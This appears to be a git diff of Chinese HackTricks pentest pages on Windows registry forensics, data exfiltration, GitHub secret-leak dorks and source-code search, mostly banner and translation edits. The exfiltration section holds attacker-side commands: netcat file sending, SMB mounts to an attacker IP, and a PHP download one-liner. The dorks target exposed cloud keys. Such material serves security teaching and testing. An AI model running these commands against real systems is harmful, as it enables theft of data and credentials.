学习并练习GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
* 查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** 上关注我们**.
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -2,20 +2,20 @@
|
|||
|
||||
### 有趣的Windows注册表键
|
||||
|
||||
{% hint style="success" %}
|
||||
学习和实践AWS黑客:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks培训AWS红队专家(ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习和实践GCP黑客:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks培训GCP红队专家(GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS&HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
|
||||
{% endhint %}
|
||||
|
||||
### **Windows版本和所有者信息**
|
||||
- 位于**`Software\Microsoft\Windows NT\CurrentVersion`**,您将找到Windows版本、服务包、安装时间以及注册所有者的名称。
|
||||
|
@ -31,7 +31,7 @@
|
|||
`fsutil behavior set disablelastaccess 0`
|
||||
|
||||
### Windows版本和服务包
|
||||
- **Windows版本**指示版本(例如,家庭版、专业版)及其发布(例如,Windows 10、Windows 11),而**服务包**是包含修复和有时新功能的更新。
|
||||
- **Windows版本**指示版本(例如,家庭版、专业版)及其发布(例如,Windows 10、Windows 11),而**服务包**是包含修复程序和有时新功能的更新。
|
||||
|
||||
### 启用最后访问时间
|
||||
- 启用最后访问时间跟踪允许您查看文件上次打开的时间,这对于取证分析或系统监控至关重要。
|
||||
|
@ -40,7 +40,7 @@
|
|||
- 注册表中保存了大量关于网络配置的数据,包括**网络类型(无线、有线、3G)**和**网络类别(公共、私人/家庭、域/工作)**,这对于了解网络安全设置和权限至关重要。
|
||||
|
||||
### 客户端端缓存(CSC)
|
||||
- **CSC**通过缓存共享文件的副本来增强离线文件访问。不同的**CSCFlags**设置控制着如何以及哪些文件被缓存,影响性能和用户体验,特别是在网络连接不稳定的环境中。
|
||||
- **CSC**通过缓存共享文件的副本来增强离线文件访问。不同的**CSCFlags**设置控制如何以及哪些文件被缓存,影响性能和用户体验,特别是在网络连接不稳定的环境中。
|
||||
|
||||
### 自启动程序
|
||||
- 在各种`Run`和`RunOnce`注册表键中列出的程序会在启动时自动运行,影响系统启动时间,并有可能成为识别恶意软件或不需要的软件的关注点。
|
||||
|
@ -52,23 +52,23 @@
|
|||
- 注册表中存储的有关USB设备的详细信息可以帮助跟踪连接到计算机的设备,可能将设备与敏感文件传输或未经授权访问事件联系起来。
|
||||
|
||||
### 卷序列号
|
||||
- **卷序列号**对于跟踪特定文件系统实例至关重要,在需要在不同设备之间建立文件来源的取证场景中非常有用。
|
||||
- **卷序列号**对于跟踪文件系统的特定实例至关重要,在需要在不同设备之间建立文件来源的取证场景中非常有用。
|
||||
|
||||
### **关机详细信息**
|
||||
- 关机时间和计数(仅适用于XP)保存在**`System\ControlSet001\Control\Windows`**和**`System\ControlSet001\Control\Watchdog\Display`**中。
|
||||
|
||||
### **网络配置**
|
||||
- 有关详细网络接口信息,请参考**`System\ControlSet001\Services\Tcpip\Parameters\Interfaces{GUID_INTERFACE}`**。
|
||||
- 有关详细网络接口信息,请参阅**`System\ControlSet001\Services\Tcpip\Parameters\Interfaces{GUID_INTERFACE}`**。
|
||||
- 首次和最后一次网络连接时间,包括VPN连接,在**`Software\Microsoft\Windows NT\CurrentVersion\NetworkList`**的各个路径下记录。
|
||||
|
||||
### **共享文件夹**
|
||||
- 共享文件夹和设置位于**`System\ControlSet001\Services\lanmanserver\Shares`**。客户端端缓存(CSC)设置决定了离线文件的可用性。
|
||||
- 共享文件夹和设置位于**`System\ControlSet001\Services\lanmanserver\Shares`**。客户端端缓存(CSC)设置决定离线文件的可用性。
|
||||
|
||||
### **自动启动的程序**
|
||||
- 类似**`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Run`**和`Software\Microsoft\Windows\CurrentVersion`下的条目详细说明了设置为在启动时运行的程序。
|
||||
|
||||
### **搜索和键入路径**
|
||||
- 在注册表中,**`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer`**下跟踪了资源管理器搜索和键入的路径,分别为WordwheelQuery和TypedPaths。
|
||||
### **搜索和输入路径**
|
||||
- 在注册表中跟踪的资源管理器搜索和输入路径分别位于**`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer`**下的WordwheelQuery和TypedPaths中。
|
||||
|
||||
### **最近文档和Office文件**
|
||||
- 访问的最近文档和Office文件记录在`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs`和特定Office版本路径中。
|
||||
|
@ -77,29 +77,30 @@
|
|||
- MRU列表,指示最近的文件路径和命令,存储在`NTUSER.DAT`的各个`ComDlg32`和`Explorer`子键中。
|
||||
|
||||
### **用户活动跟踪**
|
||||
- 用户助手功能记录了详细的应用程序使用统计信息,包括运行次数和最后运行时间,位于**`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{GUID}\Count`**。
|
||||
- 用户助手功能记录了详细的应用程序使用统计信息,包括运行次数和上次运行时间,位于**`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{GUID}\Count`**。
|
||||
|
||||
### **Shellbags分析**
|
||||
- 存储着文件夹访问详细信息的Shellbags存储在`USRCLASS.DAT`和`NTUSER.DAT`的`Software\Microsoft\Windows\Shell`下。使用**[Shellbag Explorer](https://ericzimmerman.github.io/#!index.md)**进行分析。
|
||||
- 存储着文件夹访问详细信息的Shellbags位于`USRCLASS.DAT`和`NTUSER.DAT`的`Software\Microsoft\Windows\Shell`下。使用**[Shellbag Explorer](https://ericzimmerman.github.io/#!index.md)**进行分析。
|
||||
|
||||
### **USB设备历史**
|
||||
- **`HKLM\SYSTEM\ControlSet001\Enum\USBSTOR`**和**`HKLM\SYSTEM\ControlSet001\Enum\USB`**包含有关连接的USB设备的丰富详细信息,包括制造商、产品名称和连接时间戳。
|
||||
- 可通过搜索`NTUSER.DAT`中的设备的**{GUID}**来确定与特定USB设备关联的用户。
|
||||
- 可通过`System\MountedDevices`和`Software\Microsoft\Windows NT\CurrentVersion\EMDMgmt`分别追踪最后安装的设备及其卷序列号。
|
||||
|
||||
本指南总结了访问Windows系统上详细系统、网络和用户活动信息的关键路径和方法,旨在清晰易用。
|
||||
本指南总结了访问Windows系统上详细系统、网络和用户活动信息的关键路径和方法,旨在清晰易懂。
|
||||
|
||||
|
||||
{% hint style="success" %}
|
||||
学习和实践AWS黑客:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks培训AWS红队专家(ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习和实践GCP黑客:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks培训GCP红队专家(GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS&HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,20 +1,21 @@
|
|||
# 数据泄露
|
||||
|
||||
{% hint style="success" %}
|
||||
学习并练习 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **github 仓库提交 PR 来分享黑客技巧。**
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
**Try Hard Security Group**
|
||||
**Try Hard 安全团队**
|
||||
|
||||
<figure><img src="/.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
|
@ -22,11 +23,11 @@
|
|||
|
||||
***
|
||||
|
||||
## 常见的白名单域名用于信息泄露
|
||||
## 常见被允许的域名用于泄露信息
|
||||
|
||||
查看[https://lots-project.com/](https://lots-project.com/)以找到常见的可被滥用的白名单域名
|
||||
查看 [https://lots-project.com/](https://lots-project.com/) 以找到常见被允许的域名,可以被滥用
|
||||
|
||||
## 复制\&粘贴Base64
|
||||
## 复制并粘贴 Base64
|
||||
|
||||
**Linux**
|
||||
```bash
|
||||
|
@ -127,7 +128,7 @@ app.run(ssl_context='adhoc', debug=True, host="0.0.0.0", port=8443)
|
|||
pip3 install pyftpdlib
|
||||
python3 -m pyftpdlib -p 21
|
||||
```
|
||||
### FTP服务器(NodeJS)
|
||||
### FTP 服务器 (NodeJS)
|
||||
```
|
||||
sudo npm install -g ftp-srv --save
|
||||
ftp-srv ftp://0.0.0.0:9876 --root /tmp
|
||||
|
@ -189,73 +190,19 @@ Windows
|
|||
|
||||
---
|
||||
|
||||
## Exfiltration
|
||||
### Exfiltration
|
||||
|
||||
### Techniques
|
||||
Exfiltration is the unauthorized transfer of data from a target system. There are various methods to exfiltrate data from a compromised system, including:
|
||||
|
||||
1. **Exfiltration Over C2 Channel**: Utilize the existing command and control channel to exfiltrate data.
|
||||
- **Email**: Sending data as email attachments to an external email address.
|
||||
- **FTP**: Transferring data using the File Transfer Protocol to an external server.
|
||||
- **DNS**: Sending data by encoding it within DNS requests to a controlled server.
|
||||
- **HTTP/HTTPS**: Sending data over HTTP or HTTPS to a remote server.
|
||||
- **Steganography**: Hiding data within other files or images to avoid detection.
|
||||
- **Cloud Storage**: Uploading data to cloud storage services such as Dropbox or Google Drive.
|
||||
- **Physical Media**: Copying data to removable storage devices like USB drives or external hard drives.
|
||||
|
||||
2. **Exfiltration Over Alternative Protocol**: Use alternative protocols such as DNS, ICMP, or HTTP to exfiltrate data.
|
||||
|
||||
3. **Exfiltration Over Unencrypted Protocols**: Leverage unencrypted protocols like FTP, Telnet, or HTTP to exfiltrate data.
|
||||
|
||||
4. **Exfiltration Over Encrypted Protocols**: Utilize encrypted protocols like HTTPS or SSH to exfiltrate data.
|
||||
|
||||
5. **Exfiltration Over Ingress Filtering**: Bypass egress filtering by exfiltrating data over allowed ingress channels.
|
||||
|
||||
### Tools
|
||||
|
||||
- **Netcat**: A versatile networking utility for reading from and writing to network connections.
|
||||
|
||||
- **PowerShell**: A task automation framework for configuring systems and automating tasks.
|
||||
|
||||
- **Certutil**: Command-line utility for managing certificates.
|
||||
|
||||
- **Bitsadmin**: A tool to create and manage transfer jobs using Background Intelligent Transfer Service (BITS).
|
||||
|
||||
- **FTP**: File Transfer Protocol for transferring files between a client and server on a network.
|
||||
|
||||
- **Wget**: A command-line utility for downloading files from the web.
|
||||
|
||||
- **Curl**: A tool for transferring data with URLs.
|
||||
|
||||
- **SMBClient**: A tool for accessing shared folders.
|
||||
|
||||
- **RDP**: Remote Desktop Protocol for remote access to Windows systems.
|
||||
|
||||
- **WMIC**: Command-line tool for Windows Management Instrumentation.
|
||||
|
||||
- **Reg**: Command-line utility for working with the registry.
|
||||
|
||||
- **Schtasks**: Command-line tool for managing scheduled tasks.
|
||||
|
||||
- **Bitsadmin**: Command-line tool for managing Background Intelligent Transfer Service (BITS) jobs.
|
||||
|
||||
- **Vssadmin**: Command-line tool for managing Volume Shadow Copy Service.
|
||||
|
||||
- **Wevtutil**: Command-line tool for managing event logs.
|
||||
|
||||
- **Forfiles**: Command-line tool for batch processing files.
|
||||
|
||||
- **Robocopy**: Command-line tool for copying files and directories.
|
||||
|
||||
- **Diskshadow**: Command-line tool for managing shadow copies.
|
||||
|
||||
- **Net**: Command-line tool for managing network resources.
|
||||
|
||||
- **Tasklist**: Command-line tool for listing running processes.
|
||||
|
||||
- **Taskkill**: Command-line tool for terminating processes.
|
||||
|
||||
- **Regsvr32**: Command-line tool for registering and unregistering DLLs.
|
||||
|
||||
- **Regini**: Command-line tool for modifying registry permissions.
|
||||
|
||||
- **Regsvcs**: Command-line tool for registering and unregistering .NET components.
|
||||
|
||||
- **Regsvr32**: Command-line tool for registering and unregistering DLLs.
|
||||
|
||||
- **Regsvr32**: Command-line tool for registering and unregistering DLLs.
|
||||
Exfiltration can be a critical phase of an attack as it allows threat actors to steal valuable information from a target organization. Detection and prevention of exfiltration attempts are essential for maintaining the security of a system.
|
||||
```bash
|
||||
CMD-Wind> \\10.10.14.14\path\to\exe
|
||||
CMD-Wind> net use z: \\10.10.14.14\test /user:test test #For SMB using credentials
|
||||
|
@ -277,7 +224,7 @@ sudo apt-get install sshfs
|
|||
sudo mkdir /mnt/sshfs
|
||||
sudo sshfs -o allow_other,default_permissions <Target username>@<Target IP address>:<Full path to folder>/ /mnt/sshfs/
|
||||
```
|
||||
## 网络通信
|
||||
## 网络通道
|
||||
```bash
|
||||
nc -lvnp 4444 > new_file
|
||||
nc -vn <IP> 4444 < exfil_file
|
||||
|
@ -318,7 +265,7 @@ sniff(iface="tun0", prn=process_packet)
|
|||
```
|
||||
## **SMTP**
|
||||
|
||||
如果您可以将数据发送到SMTP服务器,您可以使用Python创建一个SMTP来接收数据:
|
||||
如果您可以将数据发送到一个SMTP服务器,您可以使用Python创建一个SMTP来接收数据:
|
||||
```bash
|
||||
sudo python -m smtpd -n -c DebuggingServer :25
|
||||
```
|
||||
|
@ -350,7 +297,19 @@ echo "<?php file_put_contents('nameOfFile', fopen('http://192.168.1.102/file', '
|
|||
```
|
||||
## VBScript
|
||||
|
||||
Visual Basic Script (VBScript) 是一种基于对象的脚本语言,通常用于 Windows 环境中。VBScript 可以通过多种方式进行数据泄露,包括通过网络传输数据,将数据写入文件,或者通过电子邮件发送数据。
|
||||
### VBScript Exfiltration Techniques
|
||||
|
||||
VBScript can be used to exfiltrate data from a compromised system. Below are some common techniques used for data exfiltration using VBScript:
|
||||
|
||||
1. **Writing to Files**: VBScript can write data to files on the system, which can then be exfiltrated using various methods.
|
||||
|
||||
2. **Sending HTTP Requests**: VBScript can send HTTP requests to an external server controlled by the attacker, allowing data to be exfiltrated over the network.
|
||||
|
||||
3. **Using Email**: VBScript can be used to send emails with attached data to an external email address controlled by the attacker.
|
||||
|
||||
4. **Executing Commands**: VBScript can execute commands on the compromised system to exfiltrate data through the command line.
|
||||
|
||||
5. **Encoding Data**: VBScript can encode exfiltrated data to bypass detection mechanisms and make it harder to detect the exfiltration.
|
||||
```bash
|
||||
Attacker> python -m SimpleHTTPServer 80
|
||||
```
|
||||
|
@ -404,16 +363,17 @@ wine exe2bat.exe nc.exe nc.txt
|
|||
|
||||
{% embed url="https://discord.gg/tryhardsecurity" %}
|
||||
|
||||
{% hint style="success" %}
|
||||
学习和实践AWS黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks培训AWS红队专家(ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习和实践GCP黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks培训GCP红队专家(GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 发现我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,31 +1,32 @@
|
|||
# Github Dorks & 泄漏
|
||||
|
||||
{% hint style="success" %}
|
||||
学习并练习AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
<img src="../../.gitbook/assets/i3.png" alt="" data-size="original">\
|
||||
**漏洞赏金提示**:**注册**Intigriti,这是一家由黑客创建的高级**漏洞赏金平台**!立即加入我们,访问[**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks),开始赚取高达**$100,000**的赏金!
|
||||
**赏金提示**:**注册** Intigriti,一个由黑客创建的高级**赏金平台**!今天加入我们 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks),开始赚取高达**$100,000**的赏金!
|
||||
|
||||
{% embed url="https://go.intigriti.com/hacktricks" %}
|
||||
|
||||
现在我们已经建立了我们范围内资产的列表,是时候搜索一些OSINT低 hanging fruits 了。
|
||||
现在我们已经建立了我们范围内资产的列表,是时候搜索一些 OSINT 低 hanging fruits 了。
|
||||
|
||||
### 已经搜索泄漏的平台
|
||||
|
||||
* [https://trufflesecurity.com/blog/introducing-forager/](https://trufflesecurity.com/blog/introducing-forager/)
|
||||
|
||||
### Github中的API密钥泄漏
|
||||
### Github 中的 API 密钥泄漏
|
||||
|
||||
* [https://github.com/dxa4481/truffleHog](https://github.com/dxa4481/truffleHog)
|
||||
* [https://github.com/gitleaks/gitleaks](https://github.com/gitleaks/gitleaks)
|
||||
|
@ -321,16 +322,17 @@ GCP SECRET
|
|||
AWS SECRET
|
||||
"private" extension:pgp
|
||||
```
|
||||
{% hint style="success" %}
|
||||
学习并练习AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
其他支持HackTricks的方式:
|
||||
|
||||
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 发现我们的独家[**NFTs**]收藏品[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,18 +1,19 @@
|
|||
# 广泛源代码搜索
|
||||
|
||||
{% hint style="success" %}
|
||||
学习并实践AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并实践GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
|
||||
